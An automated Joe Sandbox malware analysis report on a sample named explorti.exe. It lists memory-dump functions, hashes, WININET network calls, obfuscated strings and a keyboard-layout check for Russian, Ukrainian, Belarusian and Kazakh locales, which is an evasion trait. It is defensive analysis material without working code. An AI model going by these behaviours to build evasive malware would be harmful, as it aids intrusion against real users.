Instruction Fuzzy Hash: 79016DAB00D030FFA1419551AE8C5FABBEBB6D56307B04527F44FC7902D16506579972

Function 05420736 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c1be0e9fe8fa0593838a041788ad50f1e5020335a42479a37c13c3e139253eb
Instruction ID: 9744522f04712aed8b20f5c1e03e3333e60e8ef1fd02650c0d32f446eb7f8b58
Opcode Fuzzy Hash: 1c1be0e9fe8fa0593838a041788ad50f1e5020335a42479a37c13c3e139253eb
Instruction Fuzzy Hash: DD014C9B00D030AFE100A5625E9C6FBBBEBB5E66307B04227F44FCBA02D5654B579962

Function 054207AF Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba2598a2e655d20166e8f2e9a9a9fbfe3c6d1fb26d0ee7a4061633e4d1bd4cfe
Instruction ID: 9765021294dcdf511a6761ad4f131e114b4c2353a2b7bcaf1b198c3fb007ab1a
Opcode Fuzzy Hash: ba2598a2e655d20166e8f2e9a9a9fbfe3c6d1fb26d0ee7a4061633e4d1bd4cfe
Instruction Fuzzy Hash: 4B01907710E2B0AFD341A6315C4C1F9BBE6E9832707344A7BD44ECB902D119488BD721

Function 05420777 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01aeee0df32235bc513f8f2a6be9bae2678595757a639ce0c1de3c097b0211b
Instruction ID: 035a4093e47cb4002ef00761edf75c544cba026d97965b8b672c3b9b006e1471
Opcode Fuzzy Hash: b01aeee0df32235bc513f8f2a6be9bae2678595757a639ce0c1de3c097b0211b
Instruction Fuzzy Hash: 45019EAA10D1309FE100A6215D9C2F7B7D7A7D57307B04723F48FDB942C06549478461

Function 05420797 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f93f7d2ea8aaaacc0160513a42b4b63a316ac632e250722e8a84ccae1d9aa758
Instruction ID: 4d3070c4d71e2ae55dd9fee56104ed184879fa585b9480b17d2954b44cd00240
Opcode Fuzzy Hash: f93f7d2ea8aaaacc0160513a42b4b63a316ac632e250722e8a84ccae1d9aa758
Instruction Fuzzy Hash: 25F08BA710D0709FD10092525DDC2FAF7EBA5D26317B00627E58FD7A43D1290A8795B2

Function 054207D2 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3879597f8d4a31c31c7de490e1e307ce64c65c5d126c30ca072b6051f0dec760
Instruction ID: f8f4eba8e3d03d2d22b7a9dddfc058c2c16d3b76ba4ee73d89092c4e67bb01de
Opcode Fuzzy Hash: 3879597f8d4a31c31c7de490e1e307ce64c65c5d126c30ca072b6051f0dec760
Instruction Fuzzy Hash: 1AF059B21486319FD290A2764D8C2EBB2DBB6826307A0563FE04BC79C2E66A14979450

Function 054207FE Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d413c72c6d6bf8afb90bd983413f680b13555cc388af13ed108b0162af2f61
Instruction ID: b1b6305b01f389b499ce3d83185ba4972ae74dc3a47acc1286764c4faa9abb20
Opcode Fuzzy Hash: 97d413c72c6d6bf8afb90bd983413f680b13555cc388af13ed108b0162af2f61
Instruction Fuzzy Hash: 1BE06892048030AF908062225D4C3FBB7CFA2826303A05723F04FC7D42D46A08969051

Analysis Process: explorti.exePID: 6488, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1970
Total number of Limit Nodes:	41

Executed Functions

Function 0013BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00188D68,00000000,00000000,00000000,00000000), ref: 0013BDEC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0013BE10
HttpOpenRequestA.WININET(?,00000000), ref: 0013BE5B
HttpSendRequestA.WININET(?,00000000), ref: 0013BF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 0013BFCD
InternetCloseHandle.WININET(?), ref: 0013C0A7
InternetCloseHandle.WININET(?), ref: 0013C0AF
InternetCloseHandle.WININET(?), ref: 0013C0B7

Strings

6JLUcxtnEx==, xrefs: 0013C2EB, 0013C543
6JLUcBRYEz9=, xrefs: 0013C385
PG3NVu==, xrefs: 0013BE33
invalid stoi argument, xrefs: 0013E404
stoi argument out of range, xrefs: 0013E3FA
PoPn, xrefs: 0013D516

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$invalid stoi argument$stoi argument out of range
API String ID: 688256393-884042532
Opcode ID: 9f3e78856b71d98db33e20914e9575b4330b74c7900a78d6fb3cf5c8eb4139b1
Instruction ID: 0b5066a74401ed4122abad555886ae8862290a79677741117a50901fea492633
Opcode Fuzzy Hash: 9f3e78856b71d98db33e20914e9575b4330b74c7900a78d6fb3cf5c8eb4139b1
Instruction Fuzzy Hash: B0B1D4B16001189BEF28DF28CC85BAEBBB9EF45304F5041A9F508A72D1DB759AC4CF94

Function 0013E440 Relevance: 13.4, Strings: 10, Instructions: 878
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0657d1, xrefs: 0013FA9E
SC==, xrefs: 0013EA1F, 0013EC66
111, xrefs: 0013F6B0
UVu=, xrefs: 001404DA
#, xrefs: 00140534
KS==, xrefs: 0013E4A5
EpPoaRV1, xrefs: 0013E47F
246122658369, xrefs: 0013F647, 0013F924, 001404F7
KIG+, xrefs: 0013E734
UFy=, xrefs: 0013F62D, 0013F90A

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=
API String ID: 0-1013059804
Opcode ID: 8c25e702d669da92c01cb938ea8450b51b70d7b90efb5a679be527ad075ebe70
Instruction ID: 393ab1c0000f504baeb15a9492a023cf2ac6ae0351d3d82773c4ec51da3768a6
Opcode Fuzzy Hash: 8c25e702d669da92c01cb938ea8450b51b70d7b90efb5a679be527ad075ebe70
Instruction Fuzzy Hash: 3A721570E04248DBEF14EFA8C9597DDBFB6AB16304F508198E805673D2C7759A88CBD2

Function 001365B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00136650

Strings

EUVmdK==, xrefs: 001366F8
PAUfbBZl, xrefs: 0013666C
GUPmdK==, xrefs: 001367A1

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: EUVmdK==$GUPmdK==$PAUfbBZl
API String ID: 1484870144-2376134257
Opcode ID: e1fdaf8ce17fc8086f00c1065da451d00b0cc57671ddcee12227a80c80c764c1
Instruction ID: c29d9e92c8f9ee182fb7eae67ac3df1c5ed4a80fb03b3c54567c4ebf2cff422c
Opcode Fuzzy Hash: e1fdaf8ce17fc8086f00c1065da451d00b0cc57671ddcee12227a80c80c764c1
Instruction Fuzzy Hash: F091B2B1A00118ABDF28DB24CC85BEDB779EB49304F4085E9E50997292DB709FC4CFA4

Function 0014D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0013247E

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: bafeb120cdd2f2e93d715f07312300d6531f2105c03c286856e362e3b5e53e5b
Instruction ID: 18cbc97cbe6dfc86b38b1098b7358f46d6ae991ecccb62fd49ae10b695b76104
Opcode Fuzzy Hash: bafeb120cdd2f2e93d715f07312300d6531f2105c03c286856e362e3b5e53e5b
Instruction Fuzzy Hash: CF518DB1E006059FDF15CF98E8817AEB7F5FB18310F24856AE805EB6A0D7749980CF50

Function 00143550 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0014425F

Part of subcall function 00147870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0014795C
Part of subcall function 00147870: __Cnd_destroy_in_situ.LIBCPMT ref: 00147968
Part of subcall function 00147870: __Mtx_destroy_in_situ.LIBCPMT ref: 00147971

Strings

0657d1, xrefs: 00145489
7470, xrefs: 0014531D
Dy==, xrefs: 0014369E, 00144D2D
KIK+, xrefs: 001447BD, 001448EC, 00144ADC, 00144C0B
8lU=, xrefs: 00146383
IEYUMK==, xrefs: 001454B9
246122658369, xrefs: 00141EA5, 001427EE, 00142A43, 00142AB0, 00142E88, 00143373, 001433D4, 00144F3A, 00144F4D, 00144F8F, 00144F99, 001454F4
Toe0, xrefs: 00145447
UIrm, xrefs: 00143BD9
6YK0, xrefs: 00145502
TZC0, xrefs: 0014541E
UIU0, xrefs: 001453A3
T4Ve, xrefs: 00143DC0
75G0, xrefs: 00145470
FAml, xrefs: 0014378F
9pG0, xrefs: 001454DB
8IG0, xrefs: 001453F5
85K3cq==, xrefs: 00144712
9YY0, xrefs: 001453CC
UZbf, xrefs: 00143AEE
7JS0, xrefs: 00145351
", xrefs: 00143E99
5120, xrefs: 00143ABF, 00143BAA
invalid stoi argument, xrefs: 00142DE9, 00142DF8, 0014425A, 00144E9D
stoi argument out of range, xrefs: 00142E02, 00144269, 00144EAC
84K0, xrefs: 00145497
TZS0, xrefs: 0014537A
KIG+, xrefs: 00144776, 001447ED, 00144A95, 00144B0C

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: "$0657d1$246122658369$5120$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$FAml$IEYUMK==$KIG+$KIK+$T4Ve$TZC0$TZS0$Toe0$UIU0$UIrm$UZbf$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-4111701409
Opcode ID: dbdee4f9d63adca49bb34067b58a00e730b4dcce7a00d0c85fcc94a826db0f78
Instruction ID: 93e65ecfca0a8b4140a55160727c87a03fbf44b0eab372005312ba4445193138
Opcode Fuzzy Hash: dbdee4f9d63adca49bb34067b58a00e730b4dcce7a00d0c85fcc94a826db0f78
Instruction Fuzzy Hash: D9523771A00248DBDF18EF78CC4AB9DBB75AF56304F50459CE405A72E2DB749B84CBA2

Function 00142E20 Relevance: 36.3, APIs: 5, Strings: 15, Instructions: 1325COMMON

Download Yara Rule

APIs

Part of subcall function 00147870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0014795C
Part of subcall function 00147870: __Cnd_destroy_in_situ.LIBCPMT ref: 00147968
Part of subcall function 00147870: __Mtx_destroy_in_situ.LIBCPMT ref: 00147971

std::_Xinvalid_argument.LIBCPMT ref: 0014425F

Strings

6JLUcxtnEx==, xrefs: 00142EC7, 00143136
UVy=, xrefs: 00141E88, 00142A26, 00142E6E
Dy==, xrefs: 0014369E
246122658369, xrefs: 00141EA5, 001427EE, 00142A43, 00142AB0, 00142E88, 00143373, 001433D4
UZbf, xrefs: 00143AEE
", xrefs: 00143E99
5120, xrefs: 00143ABF, 00143BAA
6JLUcBRYEz9=, xrefs: 00142F64
UIrm, xrefs: 00143BD9
T4Ve, xrefs: 00143DC0
invalid stoi argument, xrefs: 00142DE9, 00142DF8, 0014425A
stoi argument out of range, xrefs: 00142E02, 00144269
UVu=, xrefs: 00142A93, 00143359
UFy=, xrefs: 001427D1, 001433BA
FAml, xrefs: 0014378F

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: "$246122658369$5120$6JLUcBRYEz9=$6JLUcxtnEx==$Dy==$FAml$T4Ve$UFy=$UIrm$UVu=$UVy=$UZbf$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-2314456032
Opcode ID: 11dcdaceef05814685eb38180b4e024b999ea000bface89654a5714426fcb9e6
Instruction ID: 184a38623381f4646a275c20176ec336cc10d1aba56ca9d726c89e31343bf8ea
Opcode Fuzzy Hash: 11dcdaceef05814685eb38180b4e024b999ea000bface89654a5714426fcb9e6
Instruction Fuzzy Hash: 39B21570E002489BEF18EF68CC4ABADBB75AF55304F50419CF415AB2E2D7759B84CB92

Function 001446C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00147870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0014795C
Part of subcall function 00147870: __Cnd_destroy_in_situ.LIBCPMT ref: 00147968
Part of subcall function 00147870: __Mtx_destroy_in_situ.LIBCPMT ref: 00147971

Part of subcall function 0013BD60: InternetOpenW.WININET(00188D68,00000000,00000000,00000000,00000000), ref: 0013BDEC
Part of subcall function 0013BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0013BE10
Part of subcall function 0013BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0013BE5B

std::_Xinvalid_argument.LIBCPMT ref: 00144EA2

Strings

0657d1, xrefs: 00145489
7470, xrefs: 0014531D
9pG0, xrefs: 001454DB
Dy==, xrefs: 0014369E, 00144D2D
8IG0, xrefs: 001453F5
KIK+, xrefs: 001447BD, 001448EC, 00144ADC, 00144C0B
8lU=, xrefs: 00146383, 00146652
IEYUMK==, xrefs: 001454B9
85K3cq==, xrefs: 00144712
9YY0, xrefs: 001453CC
246122658369, xrefs: 00144F3A, 00144F4D, 00144F8F, 00144F99, 001454F4
7JS0, xrefs: 00145351
Toe0, xrefs: 00145447
6YK0, xrefs: 00145502
TZC0, xrefs: 0014541E
UIU0, xrefs: 001453A3
stoi argument out of range, xrefs: 00144269, 00144EAC
84K0, xrefs: 00145497
TZS0, xrefs: 0014537A
75G0, xrefs: 00145470
KIG+, xrefs: 00144776, 001447ED, 00144A95, 00144B0C

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range
API String ID: 2414744145-1285461467
Opcode ID: cbf332424df49a37593a2c5e0df8652d56dba24c4197fde112738a085cc82f80
Instruction ID: d5447f45b911babd4fe436cdc0a72278a6e63d9adcfca15faca6df8152957ffe
Opcode Fuzzy Hash: cbf332424df49a37593a2c5e0df8652d56dba24c4197fde112738a085cc82f80
Instruction Fuzzy Hash: F9234771E001549BEF19DB28CD997ADBB729B92308F5481D8E008AB2E6DB355FC4CF52

Function 00135DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Keyboard Layout\Preload, xrefs: 00135F64
00000423, xrefs: 0013600A
00000419, xrefs: 00135FA8
00000422, xrefs: 00135FD9
0000043f, xrefs: 0013603B

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.00000000003FC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000429000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.0000000000430000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000043F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446385620.0000000000440000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446731479.00000000005DC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4446781685.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: e60bfa6296eeceace0cda7c0c4f22d0a1a18bfd059a0b4a4df1cb29749c39fc9
Instruction ID: fcf1482f2455a61e05d4e79ba35f6e8dd649954ed3f26d1f43cb4e19f4a642ce
Opcode Fuzzy Hash: e60bfa6296eeceace0cda7c0c4f22d0a1a18bfd059a0b4a4df1cb29749c39fc9
Instruction Fuzzy Hash: C4E17E71900218BBEF24DFA4CC99BEDB7B9AB15304F5042D9E409A7291DB74AFC48F51

Function 00137D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00137EA3

Strings

HlusMa==, xrefs: 0013810A
HlurOK==, xrefs: 00138062
HlurNa==, xrefs: 001381B2

Memory Dump Source

Source File: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.4445391542.0000000000130000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445450210.0000000000192000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445622076.0000000000199000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000019B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4445680795.000000000031D000.00000040.00000001.01000000.00000008.sdmpDownload File
